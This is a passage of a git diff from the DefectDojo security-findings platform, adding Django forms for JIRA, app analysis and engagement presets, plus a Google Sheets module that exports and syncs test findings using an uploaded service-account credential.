forms.IntegerField(required=True, + widget=forms.widgets.HiddenInput()) + + class Meta: + model = JIRA_Instance + fields = ['id'] + + class ToolTypeForm(forms.ModelForm): class Meta: model = Tool_Type @@ -2922,6 +3186,36 @@ def __init__(self, *args, **kwargs): self.fields["website_found"].disabled = True +class RegulationForm(forms.ModelForm): + class Meta: + model = Regulation + exclude = ['product'] + + +class AppAnalysisForm(forms.ModelForm): + user = forms.ModelChoiceField(queryset=Dojo_User.objects.exclude(is_active=False).order_by('first_name', 'last_name'), required=True) + + class Meta: + model = App_Analysis + exclude = ['product'] + + +class DeleteAppAnalysisForm(forms.ModelForm): + class Meta: + model = App_Analysis + exclude = ['product', 'tags'] + + def __init__(self, *args, **kwargs): + super(DeleteAppAnalysisForm, self).__init__(*args, **kwargs) + self.fields['name'].disabled = True + self.fields['user'].disabled = True + self.fields['confidence'].disabled = True + self.fields['version'].disabled = True + self.fields['icon'].disabled = True + self.fields['website'].disabled = True + self.fields['website_found'].disabled = True + + class ToolConfigForm(forms.ModelForm): tool_type = forms.ModelChoiceField(queryset=Tool_Type.objects.all(), label="Tool Type") ssh = forms.CharField(widget=forms.Textarea(attrs={}), required=False, label="SSH Key") @@ -2991,6 +3285,30 @@ class Meta: model = Objects_Product fields = ["id"] + def clean(self): + from django.core.validators import URLValidator + form_data = self.cleaned_data + + try: + if form_data["url"] is not None: + url_validator = URLValidator(schemes=['ssh', 'http', 'https']) + url_validator(form_data["url"]) + except forms.ValidationError: + raise forms.ValidationError( + 'It does not appear as though this endpoint is a valid URL/SSH or IP address.', + code='invalid') + + return form_data + + +class DeleteObjectsSettingsForm(forms.ModelForm): + id = forms.IntegerField(required=True, + widget=forms.widgets.HiddenInput()) + + class Meta: + model = Objects_Product + fields = ['id'] + class DeleteToolProductSettingsForm(forms.ModelForm): id = forms.IntegerField(required=True, @@ -3042,6 +3360,42 @@ def __init__(self, *args, **kwargs): def clean(self): return self.cleaned_data + def clean(self): + from django.core.validators import URLValidator + form_data = self.cleaned_data + + try: + if form_data["url"] is not None: + url_validator = URLValidator(schemes=['ssh', 'http', 'https']) + url_validator(form_data["url"]) + except forms.ValidationError: + raise forms.ValidationError( + 'It does not appear as though this endpoint is a valid URL/SSH or IP address.', + code='invalid') + + return form_data + + +class ObjectSettingsForm(forms.ModelForm): + + # tags = forms.CharField(widget=forms.SelectMultiple(choices=[]), + # required=False, + # help_text="Add tags that help describe this object. " + # "Choose from the list or add new tags. Press TAB key to add.") + + class Meta: + model = Objects_Product + fields = ['path', 'folder', 'artifact', 'name', 'review_status', 'tags'] + exclude = ['product'] + + def __init__(self, *args, **kwargs): + super(ObjectSettingsForm, self).__init__(*args, **kwargs) + + def clean(self): + form_data = self.cleaned_data + + return form_data + class CredMappingForm(forms.ModelForm): cred_user = forms.ModelChoiceField( @@ -3096,6 +3450,28 @@ class Meta: fields = ["id"] +class EngagementPresetsForm(forms.ModelForm): + + notes = forms.CharField(widget=forms.Textarea(attrs={}), + required=False, help_text="Description of what needs to be tested or setting up environment for testing") + + scope = forms.CharField(widget=forms.Textarea(attrs={}), + required=False, help_text="Scope of Engagement testing, IP's/Resources/URL's)") + + class Meta: + model = Engagement_Presets + exclude = ['product'] + + +class DeleteEngagementPresetsForm(forms.ModelForm): + id = forms.IntegerField(required=True, + widget=forms.widgets.HiddenInput()) + + class Meta: + model = Engagement_Presets + fields = ['id'] + + class SystemSettingsForm(forms.ModelForm): jira_webhook_secret = forms.CharField(required=False) @@ -3146,6 +3522,7 @@ class Meta: exclude = [""] + class NotificationsForm(forms.ModelForm): class Meta: @@ -3364,6 +3741,128 @@ def __init__(self, *args, **kwargs): push_to_github = forms.BooleanField(required=False) +class JIRAProjectForm(forms.ModelForm): + inherit_from_product = forms.BooleanField(label='inherit JIRA settings from product', required=False) + jira_instance = forms.ModelChoiceField(queryset=JIRA_Instance.objects.all(), label='JIRA Instance', required=False) + issue_template_dir = forms.ChoiceField(required=False, + choices=JIRA_TEMPLATE_CHOICES, + help_text='Choose the folder containing the Django templates used to render the JIRA issue description. These are stored in dojo/templates/issue-trackers. Leave empty to use the default jira_full templates.') + + prefix = 'jira-project-form' + + class Meta: + model = JIRA_Project + exclude = ['product', 'engagement'] + fields = ['inherit_from_product', 'jira_instance', 'project_key', 'issue_template_dir', 'component', 'push_all_issues', 'enable_engagement_epic_mapping', 'push_notes', 'product_jira_sla_notification', 'risk_acceptance_expiration_notification'] + + def __init__(self, *args, **kwargs): + from dojo.jira_link import helper as jira_helper + # if the form is shown for an engagement, we set a placeholder text around inherited settings from product + self.target = kwargs.pop('target', 'product') + self.product = kwargs.pop('product', None) + self.engagement = kwargs.pop('engagement', None) + super().__init__(*args, **kwargs) + + logger.debug('self.target: %s, self.product: %s, self.instance: %s', self.target, self.product, self.instance) + logger.debug('data: %s', self.data) + if self.target == 'engagement': + product_name = self.product.name if self.product else self.engagement.product.name if self.engagement.product else '' + + self.fields['project_key'].widget = forms.TextInput(attrs={'placeholder': 'JIRA settings inherited from product ''%s''' % product_name}) + self.fields['project_key'].help_text = 'JIRA settings are inherited from product ''%s'', unless configured differently here.' % product_name + self.fields['jira_instance'].help_text = 'JIRA settings are inherited from product ''%s'' , unless configured differently here.' % product_name + + # if we don't have an instance, django will insert a blank empty one :-( + # so we have to check for id to make sure we only trigger this when there is a real instance from db + if self.instance.id: + logger.debug('jira project instance found for engagement, unchecking inherit checkbox') + self.fields['jira_instance'].required = True + self.fields['project_key'].required = True + self.initial['inherit_from_product'] = False + # once a jira project config is attached to an engagement, we can't go back to inheriting + # because the config needs to remain in place for the existing jira issues + self.fields['inherit_from_product'].disabled = True + self.fields['inherit_from_product'].help_text = 'Once an engagement has a JIRA Project stored, you cannot switch back to inheritance to avoid breaking existing JIRA issues' + self.fields['jira_instance'].disabled = False + self.fields['project_key'].disabled = False + self.fields['issue_template_dir'].disabled = False + self.fields['component'].disabled = False + self.fields['push_all_issues'].disabled = False + self.fields['enable_engagement_epic_mapping'].disabled = False + self.fields['push_notes'].disabled = False + self.fields['product_jira_sla_notification'].disabled = False + self.fields['risk_acceptance_expiration_notification'].disabled = False + + elif self.product: + logger.debug('setting jira project fields from product1') + self.initial['inherit_from_product'] = True + jira_project_product = jira_helper.get_jira_project(self.product) + # we have to check that we are not in a POST request where jira project config data is posted + # this is because initial values will overwrite the actual values entered by the user + # makes no sense, but seems to be accepted behaviour: https://code.djangoproject.com/ticket/30407 + if jira_project_product and not (self.prefix + '-jira_instance') in self.data: + logger.debug('setting jira project fields from product2') + self.initial['jira_instance'] = jira_project_product.jira_instance.id if jira_project_product.jira_instance else None + self.initial['project_key'] = jira_project_product.project_key + self.initial['issue_template_dir'] = jira_project_product.issue_template_dir + self.initial['component'] = jira_project_product.component + self.initial['push_all_issues'] = jira_project_product.push_all_issues + self.initial['enable_engagement_epic_mapping'] = jira_project_product.enable_engagement_epic_mapping + self.initial['push_notes'] = jira_project_product.push_notes + self.initial['product_jira_sla_notification'] = jira_project_product.product_jira_sla_notification + self.initial['risk_acceptance_expiration_notification'] = jira_project_product.risk_acceptance_expiration_notification + + self.fields['jira_instance'].disabled = True + self.fields['project_key'].disabled = True + self.fields['issue_template_dir'].disabled = True + self.fields['component'].disabled = True + self.fields['push_all_issues'].disabled = True + self.fields['enable_engagement_epic_mapping'].disabled = True + self.fields['push_notes'].disabled = True + self.fields['product_jira_sla_notification'].disabled = True + self.fields['risk_acceptance_expiration_notification'].disabled = True + + else: + del self.fields['inherit_from_product'] + + # if we don't have an instance, django will insert a blank empty one :-( + # so we have to check for id to make sure we only trigger this when there is a real instance from db + if self.instance.id: + self.fields['jira_instance'].required = True + self.fields['project_key'].required = True + + def clean(self): + logger.debug('validating jira project form') + cleaned_data = super().clean() + + logger.debug('clean: inherit: %s', self.cleaned_data.get('inherit_from_product', False)) + if not self.cleaned_data.get('inherit_from_product', False): + jira_instance = self.cleaned_data.get('jira_instance') + project_key = self.cleaned_data.get('project_key') + + if project_key and jira_instance: + return cleaned_data + + if not project_key and not jira_instance: + return cleaned_data + + if self.target == 'engagement': + raise ValidationError('JIRA Project needs a JIRA Instance and JIRA Project Key, or choose to inherit settings from product') + else: + raise ValidationError('JIRA Project needs a JIRA Instance and JIRA Project Key, leave empty to have no JIRA integration setup') + + +class GITHUBFindingForm(forms.Form): + def __init__(self, *args, **kwargs): + self.enabled = kwargs.pop('enabled') + super(GITHUBFindingForm, self).__init__(*args, **kwargs) + self.fields['push_to_github'] = forms.BooleanField() + self.fields['push_to_github'].required = False + self.fields['push_to_github'].help_text = "Checking this will overwrite content of your Github issue, or create one." + + push_to_github = forms.BooleanField(required=False) + + class JIRAFindingForm(forms.Form): def __init__(self, *args, **kwargs): self.push_all = kwargs.pop("push_all", False) diff --git a/dojo/google_sheet/__init__.py b/dojo/google_sheet/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/google_sheet/urls.py b/dojo/google_sheet/urls.py new file mode 100644 index 00000000000..da0602eb665 --- /dev/null +++ b/dojo/google_sheet/urls.py @@ -0,0 +1,11 @@ +from django.conf.urls import url + +from dojo.google_sheet import views + +urlpatterns = [ + # google_sheet + url(r'^configure_google_sheets$', views.configure_google_sheets, + name='configure_google_sheets'), + url(r'^export_to_sheet/(?P\d+)$', views.export_to_sheet, + name='export_to_sheet'), +] diff --git a/dojo/google_sheet/views.py b/dojo/google_sheet/views.py new file mode 100644 index 00000000000..987e9a39810 --- /dev/null +++ b/dojo/google_sheet/views.py @@ -0,0 +1,914 @@ +# google sheets + +import logging +import json +import datetime +import httplib2 +import googleapiclient.discovery +from google.oauth2 import service_account + +from django.shortcuts import render, get_object_or_404 +from django.http import HttpResponseRedirect +from django.urls import reverse +from django.utils import timezone +from django.contrib import messages +from django.contrib.auth.models import User +from django.core.exceptions import PermissionDenied +from django.views.decorators.debug import sensitive_variables, sensitive_post_parameters + +from dojo.models import Finding, System_Settings, Test, Dojo_User, Note_Type, NoteHistory, Notes, Sonarqube_Issue +from dojo.forms import GoogleSheetFieldsForm +from dojo.utils import add_breadcrumb, Product_Tab +from dojo.authorization.authorization_decorators import user_is_authorized +from dojo.authorization.roles_permissions import Permissions +from dojo.authorization.authorization_decorators import user_is_configuration_authorized + +logger = logging.getLogger(__name__) + + +@sensitive_post_parameters() +@user_is_configuration_authorized('dojo.change_google_sheet', 'superuser') +def configure_google_sheets(request): + fields = Finding._meta.fields + system_settings = get_object_or_404(System_Settings, id=1) + revoke_access = False + if system_settings.credentials: + revoke_access = True + column_details = json.loads(system_settings.column_widths.replace("'", '"')) + initial = {} + for field in fields: + initial[field.name] = column_details[field.name][0] + if column_details[field.name][1] == 0: + initial['Protect ' + field.name] = False + else: + initial['Protect ' + field.name] = True + initial['drive_folder_ID'] = system_settings.drive_folder_ID + initial['email_address'] = system_settings.email_address + initial['enable_service'] = system_settings.enable_google_sheets + form = GoogleSheetFieldsForm(all_fields=fields, initial=initial, credentials_required=False) + else: + form = GoogleSheetFieldsForm(all_fields=fields, credentials_required=True) + if request.method == 'POST': + if system_settings.credentials: + form = GoogleSheetFieldsForm(request.POST, request.FILES, all_fields=fields, credentials_required=False) + else: + form = GoogleSheetFieldsForm(request.POST, request.FILES, all_fields=fields, credentials_required=True) + + if request.POST.get('revoke'): + system_settings.column_widths = "" + system_settings.credentials = "" + system_settings.drive_folder_ID = "" + system_settings.email_address = "" + system_settings.enable_google_sheets = False + system_settings.save() + messages.add_message( + request, + messages.SUCCESS, + "Access revoked", + extra_tags="alert-success",) + return HttpResponseRedirect(reverse('dashboard')) + + if request.POST.get('update'): + if form.is_valid(): + # Create a dictionary object from the uploaded credentials file + if len(request.FILES) != 0: + cred_file = request.FILES['cred_file'] + cred_byte = cred_file.read() # read data from the temporary uploaded file + cred_str = cred_byte.decode('utf8') # convert bytes object to string + initial = True + else: + cred_str = system_settings.credentials + initial = False + + # Get the drive folder ID + drive_folder_ID = form.cleaned_data['drive_folder_ID'] + validate_inputs = validate_drive_authentication(request, cred_str, drive_folder_ID) + + if validate_inputs: + # Create a dictionary of column names and widths + column_widths = {} + for i in fields: + column_widths[i.name] = [] + column_widths[i.name].append(form.cleaned_data[i.name]) + if form.cleaned_data['Protect ' + i.name]: + column_widths[i.name].append(1) + else: + column_widths[i.name].append(0) + + system_settings.column_widths = column_widths + system_settings.credentials = cred_str + system_settings.drive_folder_ID = drive_folder_ID + system_settings.email_address = form.cleaned_data['email_address'] + system_settings.enable_google_sheets = form.cleaned_data['enable_service'] + system_settings.save() + if initial: + messages.add_message( + request, + messages.SUCCESS, + "Google Drive configuration saved successfully.", + extra_tags="alert-success", + ) + else: + messages.add_message( + request, + messages.SUCCESS, + "Google Drive configuration updated successfully.", + extra_tags="alert-success", + ) + return HttpResponseRedirect(reverse('dashboard')) + else: + system_settings.enable_google_sheets = False + system_settings.save() + add_breadcrumb(title="Google Sheet Sync Configuration", top_level=True, request=request) + return render(request, 'dojo/google_sheet_configuration.html', { + 'name': 'Google Sheet Sync Configuration', + 'metric': False, + 'form': form, + 'revoke_access': revoke_access, + }) + + +@sensitive_variables('cred_str', 'drive_folder_ID', 'service_account_info') +def validate_drive_authentication(request, cred_str, drive_folder_ID): + SCOPES = ['https://www.googleapis.com/auth/drive', 'https://www.googleapis.com/auth/spreadsheets'] + service_account_info = json.loads(cred_str) + try: + # Validate the uploaded credentials file + credentials = service_account.Credentials.from_service_account_info(service_account_info, scopes=SCOPES) + except ValueError: + messages.add_message( + request, + messages.ERROR, + 'Invalid credentials file.', + extra_tags='alert-danger') + return False + else: + sheets_service = googleapiclient.discovery.build('sheets', 'v4', credentials=credentials, cache_discovery=False) + drive_service = googleapiclient.discovery.build('drive', 'v3', credentials=credentials, cache_discovery=False) + spreadsheet = { + 'properties': { + 'title': 'Test spreadsheet' + } + } + try: + # Check the sheets API is enabled or not + spreadsheet = sheets_service.spreadsheets().create(body=spreadsheet, fields='spreadsheetId').execute() + except googleapiclient.errors.HttpError: + messages.add_message( + request, + messages.ERROR, + 'Enable the Google Sheets API from the Google Developer Console.', + extra_tags='alert-danger') + return False + else: + spreadsheetId = spreadsheet.get('spreadsheetId') + try: + # Check the drive API is enabled or not + file = drive_service.files().get(fileId=spreadsheetId, fields='parents').execute() # Retrieve the existing parents to remove + except googleapiclient.errors.HttpError: + messages.add_message( + request, + messages.ERROR, + 'Enable the Google Drive API from the Google Developer Console.', + extra_tags='alert-danger') + return False + else: + previous_parents = ",".join(file.get('parents')) + folder_id = drive_folder_ID + try: + # Validate the drive folder id and it's permissions + file = drive_service.files().update(fileId=spreadsheetId, # Move the file to the new folder + addParents=folder_id, + removeParents=previous_parents, + fields='id, parents').execute() + except googleapiclient.errors.HttpError as error: + if error.resp.status == 403: + messages.add_message( + request, + messages.ERROR, + 'Unable to write to the given Google Drive folder', + extra_tags='alert-danger') + if error.resp.status == 404: + messages.add_message( + request, + messages.ERROR, + 'Invalid Google Drive folder ID', + extra_tags='alert-danger') + return False + else: + drive_service.files().delete(fileId=spreadsheetId).execute() # Delete 'test spreadsheet' + return True + + +@user_is_authorized(Test, Permissions.Test_View, 'tid') +def export_to_sheet(request, tid): + system_settings = get_object_or_404(System_Settings, id=1) + google_sheets_enabled = system_settings.enable_google_sheets + if google_sheets_enabled is False: + raise PermissionDenied + test = Test.objects.get(id=tid) + spreadsheet_name = test.engagement.product.name + "-" + test.engagement.name + "-" + str(test.id) + service_account_info = json.loads(system_settings.credentials) + SCOPES = ['https://www.googleapis.com/auth/drive', 'https://www.googleapis.com/auth/spreadsheets'] + credentials = service_account.Credentials.from_service_account_info(service_account_info, scopes=SCOPES) + try: + drive_service = googleapiclient.discovery.build('drive', 'v3', credentials=credentials, cache_discovery=False) + folder_id = system_settings.drive_folder_ID + gs_files = drive_service.files().list(q="mimeType='application/vnd.google-apps.spreadsheet' and parents in '%s' and name='%s'" % (folder_id, spreadsheet_name), + spaces='drive', + pageSize=10, + fields='files(id, name)').execute() + spreadsheets = gs_files.get('files') + if len(spreadsheets) == 1: + spreadsheetId = spreadsheets[0].get('id') + sync = sync_findings(request, tid, spreadsheetId) + errors = sync['errors'] + sheet_title = sync['sheet_title'] + if len(errors) > 0: + product_tab = Product_Tab(test.engagement.product, title="Syncing Errors", tab="engagements") + product_tab.setEngagement(test.engagement) + spreadsheet_url = 'https://docs.google.com/spreadsheets/d/' + spreadsheetId + return render( + request, 'dojo/syncing_errors.html', { + 'test': test, + 'errors': errors, + 'name': 'Google Drive Sync Errors', + 'product_tab': product_tab, + 'sheet_title': sheet_title, + 'spreadsheet_name': spreadsheet_name, + 'spreadsheet_url': spreadsheet_url + }) + else: + messages.add_message( + request, + messages.SUCCESS, + "Synched Google Sheet with database.", + extra_tags="alert-success", + ) + return HttpResponseRedirect(reverse('view_test', args=(tid, ))) + elif len(spreadsheets) == 0: + create_googlesheet(request, tid) + messages.add_message( + request, + messages.SUCCESS, + "Successfully exported finding details to Google Sheet.", + extra_tags="alert-success", + ) + return HttpResponseRedirect(reverse('view_test', args=(tid, ))) + else: + messages.add_message( + request, + messages.ERROR, + "More than one Google Sheet exists for this test. Please contact your system admin to solve the issue.", + extra_tags="alert-danger", + ) + return HttpResponseRedirect(reverse('view_test', args=(tid, ))) + except httplib2.ServerNotFoundError: + error_message = 'Unable to reach the Google Sheet API.' + return render(request, 'google_sheet_error.html', {'error_message': error_message}) + except googleapiclient.errors.HttpError as error: + error_message = 'There is a problem with the Google Sheets Sync Configuration. Contact your system admin to solve the issue.' + return render(request, 'google_sheet_error.html', {'error_message': error_message}) + except Exception as e: + error_message = e + return render(request, 'google_sheet_error.html', {'error_message': error_message}) + + +def create_googlesheet(request, tid): + user_email = request.user.email + if not user_email: + raise Exception('User must have an email address to use this feature.') + test = Test.objects.get(id=tid) + system_settings = get_object_or_404(System_Settings, id=1) + service_account_info = json.loads(system_settings.credentials) + SCOPES = ['https://www.googleapis.com/auth/drive', 'https://www.googleapis.com/auth/spreadsheets'] + credentials = service_account.Credentials.from_service_account_info(service_account_info, scopes=SCOPES) + sheets_service = googleapiclient.discovery.build('sheets', 'v4', credentials=credentials, cache_discovery=False) + drive_service = googleapiclient.discovery.build('drive', 'v3', credentials=credentials, cache_discovery=False) + # Create a new spreadsheet + spreadsheet_name = test.engagement.product.name + "-" + test.engagement.name + "-" + str(test.id) + spreadsheet = { + 'properties': { + 'title': spreadsheet_name + } + } + spreadsheet = sheets_service.spreadsheets().create(body=spreadsheet, fields='spreadsheetId').execute() + spreadsheetId = spreadsheet.get('spreadsheetId') + folder_id = system_settings.drive_folder_ID + + # Move the spreadsheet inside the drive folder + file = drive_service.files().get(fileId=spreadsheetId, fields='parents').execute() + previous_parents = ",".join(file.get('parents')) + file = drive_service.files().update(fileId=spreadsheetId, + addParents=folder_id, + removeParents=previous_parents, + fields='id, parents').execute() + # Share created Spreadsheet with current user + drive_service.permissions().create(body={'type': 'user', 'role': 'writer', 'emailAddress': user_email}, fileId=spreadsheetId).execute() + populate_sheet(tid, spreadsheetId) + + +def sync_findings(request, tid, spreadsheetId): + test = Test.objects.get(id=tid) + system_settings = get_object_or_404(System_Settings, id=1) + service_account_info = json.loads(system_settings.credentials) + SCOPES = ['https://www.googleapis.com/auth/spreadsheets'] + credentials = service_account.Credentials.from_service_account_info(service_account_info, scopes=SCOPES) + sheets_service = googleapiclient.discovery.build('sheets', 'v4', credentials=credentials, cache_discovery=False) + res = {} + spreadsheet = sheets_service.spreadsheets().get(spreadsheetId=spreadsheetId).execute() + sheet_names = [] + for sheet in spreadsheet['sheets']: + date = (sheet['properties']['title']) + try: + date = datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S") + sheet_names.append(date) + except: + pass + try: + sheet_title = str(max(sheet_names)) + except: + raise Exception('Existing Google Spreadsheet has errors. Delete the speadsheet and export again.') + res['sheet_title'] = sheet_title + + result = sheets_service.spreadsheets().values().get(spreadsheetId=spreadsheetId, range=sheet_title).execute() + rows = result.get('values', []) + header_raw = rows[0] + findings_sheet = rows[1:] + findings_db = Finding.objects.filter(test=test).order_by('numerical_severity') + column_details = json.loads(system_settings.column_widths.replace("'", '"')) + active_note_types = Note_Type.objects.filter(is_active=True) + note_type_activation = len(active_note_types) + + errors = [] + index_of_active = header_raw.index('active') + index_of_verified = header_raw.index('verified') + index_of_duplicate = header_raw.index('duplicate') + index_of_false_p = header_raw.index('false_p') + index_of_id = header_raw.index('id') + + for finding_sheet in findings_sheet: + finding_id = finding_sheet[index_of_id] + active = finding_sheet[index_of_active] + verified = finding_sheet[index_of_verified] + duplicate = finding_sheet[index_of_duplicate] + false_p = finding_sheet[index_of_false_p] + + if (active == 'TRUE' or verified == 'TRUE') and duplicate == 'TRUE': # Check update finding conditions + error = 'Duplicate findings cannot be verified or active' + errors.append({'finding_id': finding_id, 'column_names': 'active, verified, duplicate', 'error': error}) + elif false_p == 'TRUE' and verified == 'TRUE': + error = 'False positive findings cannot be verified.' + errors.append({'finding_id': finding_id, 'column_names': 'false_p, verified', 'error': error}) + else: + try: + finding_db = findings_db.get(id=finding_id) # Update finding attributes + except: + if finding_id is None: + finding_id = 'Null' + error = 'Finding does not belong to the Test' + errors.append({'finding_id': finding_id, 'column_names': 'id', 'error': error}) + else: + finding_notes = finding_db.notes.all() + for column_name in header_raw: + if column_name in column_details: + if int(column_details[column_name][1]) == 0: + index_of_column = header_raw.index(column_name) + if finding_sheet[index_of_column] == 'TRUE': + setattr(finding_db, column_name, True) + elif finding_sheet[index_of_column] == 'FALSE': + setattr(finding_db, column_name, False) + else: + if finding_sheet[index_of_column] == '': + setattr(finding_db, column_name, None) + else: + setattr(finding_db, column_name, finding_sheet[index_of_column]) + elif column_name[:6] == '[note]' and column_name[-3:] == '_id': # Updating notes + note_column_name = column_name[:-3] + try: + index_of_note_column = header_raw.index(note_column_name) + except ValueError: + pass + else: + index_of_id_column = header_raw.index(column_name) + note_id = finding_sheet[index_of_id_column] + note_entry = finding_sheet[index_of_note_column].rstrip() + if note_entry != '': + if note_id != '': # If the note is an existing one + note_db = finding_notes.get(id=note_id) + if note_entry != note_db.entry.rstrip(): + note_db.entry = note_entry + note_db.edited = True + note_db.editor = request.user + note_db.edit_time = timezone.now() + history = NoteHistory(data=note_db.entry, + time=note_db.edit_time, + current_editor=note_db.editor) + history.save() + note_db.history.add(history) + note_db.save() + else: # If the note is a newly added one + if note_type_activation: + if note_column_name[7:12] == 'Note_': + error = 'Can not add new notes without a note-type. Add your note under the correct note-type column' + errors.append({'finding_id': finding_id, 'column_names': note_column_name, 'error': error}) + else: + note_type_name = note_column_name[7:][:-2] + try: + note_type = active_note_types.get(name=note_type_name) + except: + try: + note_type = Note_Type.objects.get(name=note_type_name) + except: + pass + else: + error = '"' + note_type_name + '" Note-type is disabled. Cannot add new notes of "' + note_type_name + '" type' + errors.append({'finding_id': finding_id, 'column_names': note_column_name, 'error': error}) + else: + new_note = Notes(note_type=note_type, + entry=note_entry, + date=timezone.now(), + author=request.user) + new_note.save() + history = NoteHistory(data=new_note.entry, + time=new_note.date, + current_editor=new_note.author, + note_type=new_note.note_type) + history.save() + new_note.history.add(history) + finding_db.notes.add(new_note) + else: + if note_column_name[7:12] == 'Note_': + new_note = Notes(entry=note_entry, + date=timezone.now(), + author=request.user) + new_note.save() + history = NoteHistory(data=new_note.entry, + time=new_note.date, + current_editor=new_note.author) + history.save() + new_note.history.add(history) + finding_db.notes.add(new_note) + else: + error_location = finding_id + ' ' + note_column_name + error = 'Note-types are not enabled. Notes cannot have a note-type.' + errors.append({'finding_id': finding_id, 'column_names': note_column_name, 'error': error}) + finding_db.save() + res['errors'] = errors + populate_sheet(tid, spreadsheetId) + return res + + +def populate_sheet(tid, spreadsheetId): + system_settings = get_object_or_404(System_Settings, id=1) + service_account_info = json.loads(system_settings.credentials) + service_account_email = service_account_info['client_email'] + email_address = system_settings.email_address + SCOPES = ['https://www.googleapis.com/auth/spreadsheets'] + credentials = service_account.Credentials.from_service_account_info(service_account_info, scopes=SCOPES) + sheets_service = googleapiclient.discovery.build('sheets', 'v4', credentials=credentials, cache_discovery=False) + findings_list = get_findings_list(tid) + row_count = len(findings_list) + column_count = len(findings_list[0]) + + # Create new sheet in the spreadsheet + now = datetime.datetime.now() + sheet_title = now.strftime("%Y-%m-%d %H:%M:%S") + new_sheet = { + "requests": [{ + "addSheet": { + "properties": { + "title": sheet_title, + "gridProperties": { + "rowCount": row_count, + "columnCount": column_count + } + } + } + }] + } + sheets_service.spreadsheets().batchUpdate(spreadsheetId=spreadsheetId, body=new_sheet).execute() + + # Move new sheet to the left most corner + spreadsheet = sheets_service.spreadsheets().get(spreadsheetId=spreadsheetId).execute() + for sheet in spreadsheet['sheets']: + if sheet['properties']['title'] == sheet_title: + sheet_id = sheet['properties']['sheetId'] + break + reqs = { + 'requests': [ + {'updateSheetProperties': { + 'properties': { + 'sheetId': sheet_id, + 'index': 0 + }, + "fields": "index" + }} + ]} + sheets_service.spreadsheets().batchUpdate(spreadsheetId=spreadsheetId, body=reqs).execute() + + # Update created sheet with finding details + result = sheets_service.spreadsheets().values().update(spreadsheetId=spreadsheetId, + range=sheet_title, + valueInputOption='RAW', + body={'values': findings_list}).execute() + + # Format the header row + body = { + "requests": [ + { + "repeatCell": { + "range": { + "sheetId": sheet_id, + "startRowIndex": 0, + "endRowIndex": 1 + }, + "cell": { + "userEnteredFormat": { + "backgroundColor": { + "red": 0.0, + "green": 0.0, + "blue": 0.0 + }, + "horizontalAlignment": "CENTER", + "textFormat": { + "foregroundColor": { + "red": 1.0, + "green": 1.0, + "blue": 1.0 + }, + "fontSize": 12, + "bold": True + } + } + }, + "fields": "userEnteredFormat(backgroundColor,textFormat,horizontalAlignment)" + } + }, + { + "updateSheetProperties": { + "properties": { + "sheetId": sheet_id, + "gridProperties": { + "frozenRowCount": 1 + } + }, + "fields": "gridProperties.frozenRowCount" + } + }, + { + "addProtectedRange": { + "protectedRange": { + "range": { + "sheetId": sheet_id, + "startRowIndex": 0, + "endRowIndex": 1, + "startColumnIndex": 0, + "endColumnIndex": column_count, + }, + "editors": { + "users": [ + service_account_email, + email_address + ] + }, + # "description": "Protecting total row", + "warningOnly": False + } + } + } + ] + } + sheets_service.spreadsheets().batchUpdate(spreadsheetId=spreadsheetId, body=body).execute() + + # Format columns with input field widths and protect columns + range = sheet_title + '!1:1' + result = sheets_service.spreadsheets().values().get(spreadsheetId=spreadsheetId, range=range).execute() + rows = result.get('values', []) + header_raw = rows[0] + fields = Finding._meta.fields + column_details = json.loads(system_settings.column_widths.replace("'", '"')) + body = {} + body["requests"] = [] + for column_name in header_raw: + index_of_column = header_raw.index(column_name) + if column_name in column_details: + # If column width is 0 hide column + if int(column_details[column_name][0]) == 0: + body["requests"].append({ + "updateDimensionProperties": { + "range": { + "sheetId": sheet_id, + "dimension": "COLUMNS", + "startIndex": index_of_column, + "endIndex": index_of_column + 1 + }, + "properties": { + "hiddenByUser": True, + }, + "fields": "hiddenByUser" + } + }) + else: + # If column width is not 0 adjust column to given width + body["requests"].append({ + "updateDimensionProperties": { + "range": { + "sheetId": sheet_id, + "dimension": "COLUMNS", + "startIndex": index_of_column, + "endIndex": index_of_column + 1 + }, + "properties": { + "pixelSize": column_details[column_name][0] + }, + "fields": "pixelSize" + } + }) + # If protect column is true, protect in sheet + if column_details[column_name][1] == 1: + body["requests"].append({ + "addProtectedRange": { + "protectedRange": { + "range": { + "sheetId": sheet_id, + "startRowIndex": 1, + "endRowIndex": row_count, + "startColumnIndex": index_of_column, + "endColumnIndex": index_of_column + 1, + }, + "editors": { + "users": [ + service_account_email, + email_address + ] + }, + "warningOnly": False + } + } + }) + # Format boolean fields in the google sheet + if (fields[index_of_column].get_internal_type()) == "BooleanField": + body["requests"].append({ + "setDataValidation": { + "range": { + "sheetId": sheet_id, + "startRowIndex": 1, + "endRowIndex": row_count, + "startColumnIndex": index_of_column, + "endColumnIndex": index_of_column + 1, + }, + "rule": { + "condition": { + "type": "BOOLEAN", + }, + "inputMessage": "Value must be BOOLEAN", + "strict": True + } + } + }) + # Format integer fields in the google sheet + elif (fields[index_of_column].get_internal_type()) == "IntegerField": + body["requests"].append({ + "setDataValidation": { + "range": { + "sheetId": sheet_id, + "startRowIndex": 1, + "endRowIndex": row_count, + "startColumnIndex": index_of_column, + "endColumnIndex": index_of_column + 1, + }, + "rule": { + "condition": { + "type": "NUMBER_GREATER", + "values": [ + { + "userEnteredValue": "-1" + } + ] + }, + "inputMessage": "Value must be an integer", + "strict": True + } + } + }) + # Format date fields in the google sheet + elif (fields[index_of_column].get_internal_type()) == "DateField": + body["requests"].append({ + "setDataValidation": { + "range": { + "sheetId": sheet_id, + "startRowIndex": 1, + "endRowIndex": row_count, + "startColumnIndex": index_of_column, + "endColumnIndex": index_of_column + 1, + }, + "rule": { + "condition": { + "type": "DATE_IS_VALID", + }, + "inputMessage": "Value must be a valid date", + "strict": True + } + } + }) + # Make severity column a dropdown + elif column_name == "severity": + body["requests"].append({ + "setDataValidation": { + "range": { + "sheetId": sheet_id, + "startRowIndex": 1, + "endRowIndex": row_count, + "startColumnIndex": index_of_column, + "endColumnIndex": index_of_column + 1, + }, + "rule": { + "condition": { + "type": "ONE_OF_LIST", + "values": [ + {"userEnteredValue": "Info"}, + {"userEnteredValue": "Low"}, + {"userEnteredValue": "Medium"}, + {"userEnteredValue": "High"}, + {"userEnteredValue": "Critical"}, + ] + }, + "inputMessage": "Value must be an one of list", + "strict": True + } + } + }) + # Hide and protect note id columns and last column + elif (column_name[:6] == '[note]' and column_name[-3:] == '_id') or column_name == 'Last column': + body["requests"].append({ + "updateDimensionProperties": { + "range": { + "sheetId": sheet_id, + "dimension": "COLUMNS", + "startIndex": index_of_column, + "endIndex": 